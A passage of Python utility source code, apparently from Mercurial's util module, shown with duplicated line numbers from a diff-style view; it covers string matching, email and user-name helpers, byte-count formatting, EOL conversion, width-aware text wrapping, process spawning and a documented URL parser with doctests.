    returns the matcher name, pattern, and matcher function.
    missing or unknown prefixes are treated as literal matches.

    helper for tests:
    >>> def test(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])
    >>> def itest(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])

    exact matching (no prefix):
    >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
    ('literal', 'abcdefg', [False, False, True])

    regex matching ('re:' prefix)
    >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
    ('re', 'a.+b', [False, False, True])

    force exact matches ('literal:' prefix)
    >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
    ('literal', 're:foobar', [False, True])

    unknown prefixes are ignored and treated as literals
    >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
    ('literal', 'foo:bar', [False, False, True])

    case insensitive regex matches
    >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
    ('re', 'A.+b', [False, False, True])

    case insensitive literal matches
    >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
    ('literal', 'ABCDEFG', [False, False, True])
    """
    if pattern.startswith('re:'):
        pattern = pattern[3:]
        try:
            flags = 0
            if not casesensitive:
                flags = remod.I
            regex = remod.compile(pattern, flags)
        except remod.error as e:
            raise error.ParseError(_('invalid regular expression: %s')
                                   % e)
        return 're', pattern, regex.search
    elif pattern.startswith('literal:'):
        pattern = pattern[8:]

    # Fall through: anything without a recognized prefix is a literal.
    match = pattern.__eq__

    if not casesensitive:
        ipat = encoding.lower(pattern)
        match = lambda s: ipat == encoding.lower(s)
    return 'literal', pattern, match
2629
2629
def shortuser(user):
    """Return a short representation of a user name or email address.

    Strips the mail domain, any "Real Name <" prefix, and anything after
    the first space or dot, e.g. 'John Doe <john.doe@x>' -> 'john'.
    """
    f = user.find('@')
    if f >= 0:
        user = user[:f]
    f = user.find('<')
    if f >= 0:
        user = user[f + 1:]
    f = user.find(' ')
    if f >= 0:
        user = user[:f]
    f = user.find('.')
    if f >= 0:
        user = user[:f]
    return user
2645
2645
def emailuser(user):
    """Return the user portion of an email address.

    e.g. 'Real Name <user@host>' -> 'user'.
    """
    f = user.find('@')
    if f >= 0:
        user = user[:f]
    f = user.find('<')
    if f >= 0:
        user = user[f + 1:]
    return user
2655
2655
def email(author):
    '''get email of author.'''
    # Slice between '<' and '>'; with neither present this returns the
    # whole string (find() yields -1 and r stays None).
    r = author.find('>')
    if r == -1:
        r = None
    return author[author.find('<') + 1:r]
2662
2662
def ellipsis(text, maxlength=400):
    """Trim string to at most maxlength (default: 400) columns in display."""
    return encoding.trim(text, maxlength, ellipsis='...')
2666
2666
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity

    ``unittable`` is a sequence of ``(multiplier, divisor, format)`` rows
    tried in order; the first row where ``abs(count) >= divisor * multiplier``
    wins, and the last row is the unconditional fallback.
    '''

    def go(count):
        for multiplier, divisor, format in unittable:
            if abs(count) >= divisor * multiplier:
                return format % (count / float(divisor))
        # Nothing matched (e.g. count == 0): use the least specific unit.
        return unittable[-1][2] % count

    return go
2677
2677
def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
        ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
        ...
    ParseError: fromline must be strictly positive
    """
    if toline - fromline < 0:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    # Convert from 1-based inclusive to 0-based half-open.
    return fromline - 1, toline
2698
2698
# Render a byte count using the largest unit that leaves at least one
# significant digit, keeping roughly three significant digits overall.
bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )
2711
2711
# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
# Note the b prefix: this pattern operates on byte strings.
_eolre = remod.compile(br'\r*\n')
2716
2716
def tolf(s):
    """Normalize line endings in s to LF (collapses CR runs before LF)."""
    return _eolre.sub('\n', s)
2719
2719
def tocrlf(s):
    """Normalize line endings in s to CRLF."""
    return _eolre.sub('\r\n', s)
2722
2722
if pycompat.oslinesep == '\r\n':
    # Native EOL is CRLF (Windows): convert to/from LF at the boundary.
    tonativeeol = tocrlf
    fromnativeeol = tolf
else:
    # Native EOL is already LF: both directions are no-ops.
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
2729
2729
def escapestr(s):
    """Return s with special bytes rendered as backslash escapes.

    codecs.escape_encode is the C routine underlying
    s.encode('string_escape'), called directly so this also works on
    Python 3 (where the 'string_escape' codec name is gone).
    """
    encoded, _consumed = codecs.escape_encode(s)
    return encoded
2734
2734
def unescapestr(s):
    """Interpret backslash escape sequences in s (inverse of escapestr)."""
    decoded, _consumed = codecs.escape_decode(s)
    return decoded
2737
2737
def forcebytestr(obj):
    """Portably format an arbitrary object (e.g. exception) into a byte
    string."""
    try:
        return pycompat.bytestr(obj)
    except UnicodeEncodeError:
        # non-ascii string, may be lossy: go through the local encoding
        # instead of propagating the failure
        return pycompat.bytestr(encoding.strtolocal(str(obj)))
2746
2746
def uirepr(s):
    """Return a byte-string repr of s suitable for user-facing output."""
    # Avoid double backslash in Windows path repr()
    return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2750
2750
# delay import of textwrap
def MBTextWrapper(**kwargs):
    """Build (once) and instantiate a column-width-aware TextWrapper.

    On first call the class is defined and then cached by rebinding this
    module-level name to the class itself (see the 'global' below), so
    later calls construct instances directly.
    """
    class tw(textwrap.TextWrapper):
        """
        Extend TextWrapper for width-awareness.

        Neither number of 'bytes' in any encoding nor 'characters' is
        appropriate to calculate terminal columns for specified string.

        Original TextWrapper implementation uses built-in 'len()' directly,
        so overriding is needed to use width information of each characters.

        In addition, characters classified into 'ambiguous' width are
        treated as wide in East Asian area, but as narrow in other.

        This requires use decision to determine width of such characters.
        """
        def _cutdown(self, ucstr, space_left):
            # Split ucstr so that the head occupies at most space_left
            # terminal columns; returns (head, remainder).
            l = 0
            colwidth = encoding.ucolwidth
            for i in xrange(len(ucstr)):
                l += colwidth(ucstr[i])
                if space_left < l:
                    return (ucstr[:i], ucstr[i:])
            return ucstr, ''

        # overriding of base class
        def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
            # Called when the next chunk cannot fit on any line: either
            # break it at the column boundary, or emit it whole on a line
            # of its own when breaking long words is disabled.
            space_left = max(width - cur_len, 1)

            if self.break_long_words:
                cut, res = self._cutdown(reversed_chunks[-1], space_left)
                cur_line.append(cut)
                reversed_chunks[-1] = res
            elif not cur_line:
                cur_line.append(reversed_chunks.pop())

        # this overriding code is imported from TextWrapper of Python 2.6
        # to calculate columns of string by 'encoding.ucolwidth()'
        def _wrap_chunks(self, chunks):
            colwidth = encoding.ucolwidth

            lines = []
            if self.width <= 0:
                raise ValueError("invalid width %r (must be > 0)" % self.width)

            # Arrange in reverse order so items can be efficiently popped
            # from a stack of chucks.
            chunks.reverse()

            while chunks:

                # Start the list of chunks that will make up the current line.
                # cur_len is just the length of all the chunks in cur_line.
                cur_line = []
                cur_len = 0

                # Figure out which static string will prefix this line.
                if lines:
                    indent = self.subsequent_indent
                else:
                    indent = self.initial_indent

                # Maximum width for this line.
                width = self.width - len(indent)

                # First chunk on line is whitespace -- drop it, unless this
                # is the very beginning of the text (i.e. no lines started yet).
                if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
                    del chunks[-1]

                while chunks:
                    l = colwidth(chunks[-1])

                    # Can at least squeeze this chunk onto the current line.
                    if cur_len + l <= width:
                        cur_line.append(chunks.pop())
                        cur_len += l

                    # Nope, this line is full.
                    else:
                        break

                # The current line is full, and the next chunk is too big to
                # fit on *any* line (not just this one).
                if chunks and colwidth(chunks[-1]) > width:
                    self._handle_long_word(chunks, cur_line, cur_len, width)

                # If the last chunk on this line is all whitespace, drop it.
                if (self.drop_whitespace and
                    cur_line and cur_line[-1].strip() == r''):
                    del cur_line[-1]

                # Convert current line back to a string and store it in list
                # of all lines (return value).
                if cur_line:
                    lines.append(indent + r''.join(cur_line))

            return lines

    # Cache the class so the next call skips the definition above.
    global MBTextWrapper
    MBTextWrapper = tw
    return tw(**kwargs)
2854
2854
def wrap(line, width, initindent='', hangindent=''):
    """Wrap the byte string line to the given terminal column width.

    initindent prefixes the first output line, hangindent every later
    one. Input is decoded with the local encoding, wrapped width-aware
    via MBTextWrapper, and re-encoded before returning.
    """
    maxindent = max(len(hangindent), len(initindent))
    if width <= maxindent:
        # adjust for weird terminal size
        width = max(78, maxindent + 1)
    line = line.decode(pycompat.sysstr(encoding.encoding),
                       pycompat.sysstr(encoding.encodingmode))
    initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
                                   pycompat.sysstr(encoding.encodingmode))
    hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
                                   pycompat.sysstr(encoding.encodingmode))
    wrapper = MBTextWrapper(width=width,
                            initial_indent=initindent,
                            subsequent_indent=hangindent)
    return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2870
2870
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            """Iterate fp's lines via readline, which retries on EINTR."""
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            """Yield fp's lines using raw os.read, retrying on EINTR."""
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    # Emit every complete line; keep a trailing partial
                    # line in 'line' for the next read.
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        """Return an iterator over fp's lines that is safe against EINTR.

        Regular on-disk files take the fast path (fp itself); other file
        objects go through _safeiterfile.
        """
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        """Return an iterator over fp's lines (no workaround needed here)."""
        return fp
2942
2942
def iterlines(iterator):
    """Yield each text line from an iterable of multi-line chunks."""
    for chunk in iterator:
        # splitlines() strips the terminators, so empty chunks yield nothing.
        chunklines = chunk.splitlines()
        for chunkline in chunklines:
            yield chunkline
2947
2947
def expandpath(path):
    """Expand environment variables, then '~' constructs, in path."""
    withvars = os.path.expandvars(path)
    return os.path.expanduser(withvars)
2950
2950
def hgcmd():
    """Return the command used to execute current hg

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.
    """
    if mainfrozen():
        if getattr(sys, 'frozen', None) == 'macosx_app':
            # Env variable set by py2app
            return [encoding.environ['EXECUTABLEPATH']]
        else:
            # other frozen builds: the running executable is hg itself
            return [pycompat.sysexecutable]
    # not a frozen build: fall back to platform-specific detection
    return gethgcmd()
2965
2965
def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent wait on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    terminated = set()
    def handler(signum, frame):
        # SIGCHLD handler: reap the child and record that it finished.
        terminated.add(os.wait())
    prevhandler = None
    SIGCHLD = getattr(signal, 'SIGCHLD', None)
    if SIGCHLD is not None:
        prevhandler = signal.signal(SIGCHLD, handler)
    try:
        pid = spawndetached(args)
        while not condfn():
            # Re-check condfn() after seeing the child die to avoid a
            # race where it succeeded just before terminating.
            if ((pid in terminated or not testpid(pid))
                and not condfn()):
                return -1
            time.sleep(0.1)
        return pid
    finally:
        # Always restore the previous SIGCHLD handler.
        if prevhandler is not None:
            signal.signal(signal.SIGCHLD, prevhandler)
3000
3000
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        # Work on a copy so the self-escaping entry added below does not
        # leak into the caller's mapping as a side effect.
        mapping = dict(mapping)
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
3025
3025
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        # Not a number: treat it as a service name and look it up.
        try:
            return socket.getservbyname(pycompat.sysstr(port))
        except socket.error:
            raise Abort(
                _("no port number associated with service '%s'") % port)
3042
3042
# Accepted spellings for boolean configuration values.
_booleans = dict.fromkeys(('1', 'yes', 'true', 'on', 'always'), True)
_booleans.update(dict.fromkeys(('0', 'no', 'false', 'off', 'never'), False))

def parsebool(s):
    """Parse s into a boolean.

    If s is not a valid boolean, returns None.
    """
    return _booleans.get(s.lower())
3053
3053
# Map every two-hex-digit string (all upper/lower case combinations) to
# the character with that ordinal, for fast %XX-style unescaping.
_hextochr = dict((a + b, chr(int(a + b, 16)))
                 for a in string.hexdigits for b in string.hexdigits)
3056
3056
3057 class url(object):
3057 class url(object):
3058 r"""Reliable URL parser.
3058 r"""Reliable URL parser.
3059
3059
3060 This parses URLs and provides attributes for the following
3060 This parses URLs and provides attributes for the following
3061 components:
3061 components:
3062
3062
3063 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
3063 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
3064
3064
3065 Missing components are set to None. The only exception is
3065 Missing components are set to None. The only exception is
3066 fragment, which is set to '' if present but empty.
3066 fragment, which is set to '' if present but empty.
3067
3067
3068 If parsefragment is False, fragment is included in query. If
3068 If parsefragment is False, fragment is included in query. If
3069 parsequery is False, query is included in path. If both are
3069 parsequery is False, query is included in path. If both are
3070 False, both fragment and query are included in path.
3070 False, both fragment and query are included in path.
3071
3071
3072 See http://www.ietf.org/rfc/rfc2396.txt for more information.
3072 See http://www.ietf.org/rfc/rfc2396.txt for more information.
3073
3073
3074 Note that for backward compatibility reasons, bundle URLs do not
3074 Note that for backward compatibility reasons, bundle URLs do not
3075 take host names. That means 'bundle://../' has a path of '../'.
3075 take host names. That means 'bundle://../' has a path of '../'.
3076
3076
3077 Examples:
3077 Examples:
3078
3078
3079 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
3079 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
3080 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
3080 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
3081 >>> url(b'ssh://[::1]:2200//home/joe/repo')
3081 >>> url(b'ssh://[::1]:2200//home/joe/repo')
3082 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
3082 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
3083 >>> url(b'file:///home/joe/repo')
3083 >>> url(b'file:///home/joe/repo')
3084 <url scheme: 'file', path: '/home/joe/repo'>
3084 <url scheme: 'file', path: '/home/joe/repo'>
3085 >>> url(b'file:///c:/temp/foo/')
3085 >>> url(b'file:///c:/temp/foo/')
3086 <url scheme: 'file', path: 'c:/temp/foo/'>
3086 <url scheme: 'file', path: 'c:/temp/foo/'>
3087 >>> url(b'bundle:foo')
3087 >>> url(b'bundle:foo')
3088 <url scheme: 'bundle', path: 'foo'>
3088 <url scheme: 'bundle', path: 'foo'>
3089 >>> url(b'bundle://../foo')
3089 >>> url(b'bundle://../foo')
3090 <url scheme: 'bundle', path: '../foo'>
3090 <url scheme: 'bundle', path: '../foo'>
3091 >>> url(br'c:\foo\bar')
3091 >>> url(br'c:\foo\bar')
3092 <url path: 'c:\\foo\\bar'>
3092 <url path: 'c:\\foo\\bar'>
3093 >>> url(br'\\blah\blah\blah')
3093 >>> url(br'\\blah\blah\blah')
3094 <url path: '\\\\blah\\blah\\blah'>
3094 <url path: '\\\\blah\\blah\\blah'>
3095 >>> url(br'\\blah\blah\blah#baz')
3095 >>> url(br'\\blah\blah\blah#baz')
3096 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3096 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3097 >>> url(br'file:///C:\users\me')
3097 >>> url(br'file:///C:\users\me')
3098 <url scheme: 'file', path: 'C:\\users\\me'>
3098 <url scheme: 'file', path: 'C:\\users\\me'>
3099
3099
3100 Authentication credentials:
3100 Authentication credentials:
3101
3101
3102 >>> url(b'ssh://joe:xyz@x/repo')
3102 >>> url(b'ssh://joe:xyz@x/repo')
3103 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3103 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3104 >>> url(b'ssh://joe@x/repo')
3104 >>> url(b'ssh://joe@x/repo')
3105 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3105 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3106
3106
3107 Query strings and fragments:
3107 Query strings and fragments:
3108
3108
3109 >>> url(b'http://host/a?b#c')
3109 >>> url(b'http://host/a?b#c')
3110 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3110 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3111 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3111 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3112 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3112 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3113
3113
3114 Empty path:
3114 Empty path:
3115
3115
3116 >>> url(b'')
3116 >>> url(b'')
3117 <url path: ''>
3117 <url path: ''>
3118 >>> url(b'#a')
3118 >>> url(b'#a')
3119 <url path: '', fragment: 'a'>
3119 <url path: '', fragment: 'a'>
3120 >>> url(b'http://host/')
3120 >>> url(b'http://host/')
3121 <url scheme: 'http', host: 'host', path: ''>
3121 <url scheme: 'http', host: 'host', path: ''>
3122 >>> url(b'http://host/#a')
3122 >>> url(b'http://host/#a')
3123 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3123 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3124
3124
3125 Only scheme:
3125 Only scheme:
3126
3126
3127 >>> url(b'http:')
3127 >>> url(b'http:')
3128 <url scheme: 'http'>
3128 <url scheme: 'http'>
3129 """
3129 """
3130
3130
3131 _safechars = "!~*'()+"
3131 _safechars = "!~*'()+"
3132 _safepchars = "/!~*'()+:\\"
3132 _safepchars = "/!~*'()+:\\"
3133 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
3133 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
3134
3134
3135 def __init__(self, path, parsequery=True, parsefragment=True):
3135 def __init__(self, path, parsequery=True, parsefragment=True):
3136 # We slowly chomp away at path until we have only the path left
3136 # We slowly chomp away at path until we have only the path left
3137 self.scheme = self.user = self.passwd = self.host = None
3137 self.scheme = self.user = self.passwd = self.host = None
3138 self.port = self.path = self.query = self.fragment = None
3138 self.port = self.path = self.query = self.fragment = None
3139 self._localpath = True
3139 self._localpath = True
3140 self._hostport = ''
3140 self._hostport = ''
3141 self._origpath = path
3141 self._origpath = path
3142
3142
3143 if parsefragment and '#' in path:
3143 if parsefragment and '#' in path:
3144 path, self.fragment = path.split('#', 1)
3144 path, self.fragment = path.split('#', 1)
3145
3145
3146 # special case for Windows drive letters and UNC paths
3146 # special case for Windows drive letters and UNC paths
3147 if hasdriveletter(path) or path.startswith('\\\\'):
3147 if hasdriveletter(path) or path.startswith('\\\\'):
3148 self.path = path
3148 self.path = path
3149 return
3149 return
3150
3150
3151 # For compatibility reasons, we can't handle bundle paths as
3151 # For compatibility reasons, we can't handle bundle paths as
3152 # normal URLS
3152 # normal URLS
3153 if path.startswith('bundle:'):
3153 if path.startswith('bundle:'):
3154 self.scheme = 'bundle'
3154 self.scheme = 'bundle'
3155 path = path[7:]
3155 path = path[7:]
3156 if path.startswith('//'):
3156 if path.startswith('//'):
3157 path = path[2:]
3157 path = path[2:]
3158 self.path = path
3158 self.path = path
3159 return
3159 return
3160
3160
3161 if self._matchscheme(path):
3161 if self._matchscheme(path):
3162 parts = path.split(':', 1)
3162 parts = path.split(':', 1)
3163 if parts[0]:
3163 if parts[0]:
3164 self.scheme, path = parts
3164 self.scheme, path = parts
3165 self._localpath = False
3165 self._localpath = False
3166
3166
3167 if not path:
3167 if not path:
3168 path = None
3168 path = None
3169 if self._localpath:
3169 if self._localpath:
3170 self.path = ''
3170 self.path = ''
3171 return
3171 return
3172 else:
3172 else:
3173 if self._localpath:
3173 if self._localpath:
3174 self.path = path
3174 self.path = path
3175 return
3175 return
3176
3176
3177 if parsequery and '?' in path:
3177 if parsequery and '?' in path:
3178 path, self.query = path.split('?', 1)
3178 path, self.query = path.split('?', 1)
3179 if not path:
3179 if not path:
3180 path = None
3180 path = None
3181 if not self.query:
3181 if not self.query:
3182 self.query = None
3182 self.query = None
3183
3183
3184 # // is required to specify a host/authority
3184 # // is required to specify a host/authority
3185 if path and path.startswith('//'):
3185 if path and path.startswith('//'):
3186 parts = path[2:].split('/', 1)
3186 parts = path[2:].split('/', 1)
3187 if len(parts) > 1:
3187 if len(parts) > 1:
3188 self.host, path = parts
3188 self.host, path = parts
3189 else:
3189 else:
3190 self.host = parts[0]
3190 self.host = parts[0]
3191 path = None
3191 path = None
3192 if not self.host:
3192 if not self.host:
3193 self.host = None
3193 self.host = None
3194 # path of file:///d is /d
3194 # path of file:///d is /d
3195 # path of file:///d:/ is d:/, not /d:/
3195 # path of file:///d:/ is d:/, not /d:/
3196 if path and not hasdriveletter(path):
3196 if path and not hasdriveletter(path):
3197 path = '/' + path
3197 path = '/' + path
3198
3198
3199 if self.host and '@' in self.host:
3199 if self.host and '@' in self.host:
3200 self.user, self.host = self.host.rsplit('@', 1)
3200 self.user, self.host = self.host.rsplit('@', 1)
3201 if ':' in self.user:
3201 if ':' in self.user:
3202 self.user, self.passwd = self.user.split(':', 1)
3202 self.user, self.passwd = self.user.split(':', 1)
3203 if not self.host:
3203 if not self.host:
3204 self.host = None
3204 self.host = None
3205
3205
3206 # Don't split on colons in IPv6 addresses without ports
3206 # Don't split on colons in IPv6 addresses without ports
3207 if (self.host and ':' in self.host and
3207 if (self.host and ':' in self.host and
3208 not (self.host.startswith('[') and self.host.endswith(']'))):
3208 not (self.host.startswith('[') and self.host.endswith(']'))):
3209 self._hostport = self.host
3209 self._hostport = self.host
3210 self.host, self.port = self.host.rsplit(':', 1)
3210 self.host, self.port = self.host.rsplit(':', 1)
3211 if not self.host:
3211 if not self.host:
3212 self.host = None
3212 self.host = None
3213
3213
3214 if (self.host and self.scheme == 'file' and
3214 if (self.host and self.scheme == 'file' and
3215 self.host not in ('localhost', '127.0.0.1', '[::1]')):
3215 self.host not in ('localhost', '127.0.0.1', '[::1]')):
3216 raise Abort(_('file:// URLs can only refer to localhost'))
3216 raise Abort(_('file:// URLs can only refer to localhost'))
3217
3217
3218 self.path = path
3218 self.path = path
3219
3219
3220 # leave the query string escaped
3220 # leave the query string escaped
3221 for a in ('user', 'passwd', 'host', 'port',
3221 for a in ('user', 'passwd', 'host', 'port',
3222 'path', 'fragment'):
3222 'path', 'fragment'):
3223 v = getattr(self, a)
3223 v = getattr(self, a)
3224 if v is not None:
3224 if v is not None:
3225 setattr(self, a, urlreq.unquote(v))
3225 setattr(self, a, urlreq.unquote(v))
3226
3226
3227 @encoding.strmethod
3227 @encoding.strmethod
3228 def __repr__(self):
3228 def __repr__(self):
3229 attrs = []
3229 attrs = []
3230 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
3230 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
3231 'query', 'fragment'):
3231 'query', 'fragment'):
3232 v = getattr(self, a)
3232 v = getattr(self, a)
3233 if v is not None:
3233 if v is not None:
3234 attrs.append('%s: %r' % (a, v))
3234 attrs.append('%s: %r' % (a, v))
3235 return '<url %s>' % ', '.join(attrs)
3235 return '<url %s>' % ', '.join(attrs)
3236
3236
    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        # Local paths (set by __init__ for scheme-less input and bundles)
        # round-trip without any quoting.
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            # Scheme-only URLs (e.g. file:///...) still need the authority
            # marker; drive letters get an extra '/' so 'd:/' stays a path.
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                # Bracketed IPv6 literals keep their colons unescaped.
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)
3315
3315
3316 def authinfo(self):
3316 def authinfo(self):
3317 user, passwd = self.user, self.passwd
